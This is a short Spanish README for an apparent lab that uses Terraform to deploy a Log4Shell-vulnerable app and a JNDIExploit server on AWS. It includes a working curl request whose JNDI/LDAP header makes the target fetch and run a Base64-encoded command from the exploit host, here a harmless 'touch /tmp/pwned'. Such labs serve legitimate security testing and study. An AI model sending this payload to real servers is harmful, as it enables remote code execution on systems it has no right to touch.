
Un Terraform para desplegar una aplicación vulnerable y un JDNIExploit para trabajar con CVE-2021-44228
Un Terraform para desplegar una aplicación vulnerable y un JNDIExploit para trabajar con CVE-2021-44228
Este terraform crea dos instancias en una VPC en AWS Cloud.
Solo necesitas exportar tus AWS_ACCESS_KEY_ID y AWS_SECRET_ACCESS_KEY
Una instancia es JNDIExploit.
La segunda es una Vulnerable-App para el exploit log4j
Por favor, reemplaza tu SSH-Public-Key en terraform antes de apply
terraform init
terraform plan
terraform apply --auto-approve
Después del despliegue en aws puedes explotarlo con una petición curl y verificar la creación de archivos en /tmp en el contenedor vulnerable-app.
curl ${vulnerable-app-IP}:8090 -H 'X-Api-Version: ${jndi:ldap://${JNDIExploit-IP}:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
En el servidor de la aplicación vulnerable ejecuta el siguiente comando para verificar la ejecución del comando, deberías ver el archivo pwned
sudo docker exec -ti vulnerable-app ls /tmp